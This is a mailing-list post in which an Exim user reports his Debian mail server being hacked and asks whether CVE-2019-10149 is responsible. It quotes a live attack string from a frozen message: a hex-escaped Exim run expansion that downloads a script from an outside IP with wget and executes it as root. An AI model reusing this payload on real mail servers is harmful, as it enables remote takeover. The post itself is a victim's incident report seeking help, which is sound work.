[exim] just been hacked, could be CVE-2019-10149?

Top Page
Delete this message
Reply to this message
Author: Calum Mackay
Date:  
To: exim-users
Subject: [exim] just been hacked, could be CVE-2019-10149?
hi all,

My mail system has just been hacked; it's running Debian unstable exim
4.91-9

Could it be CVE-2019-10149? I don't see any reports of active exploits yet.

The reasons I suspect exim involvement:

• starting today, every 5 mins getting frozen messages:

The following address(es) have yet to be delivered:

root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
Too many "Received" headers - suspected mail loop

• the trojan horse scripts, that were successfully installed on my
system, with root access, are all group Debian-exim


Luckily, it looks like the trojans did nothing more than repeated
attempts to open up my ssh server to root logins, which I think (and
hope) didn't actually work, so I may have been lucky, and the damage
isn't widespread.


ought I to be reporting this anywhere?


thanks,
calum.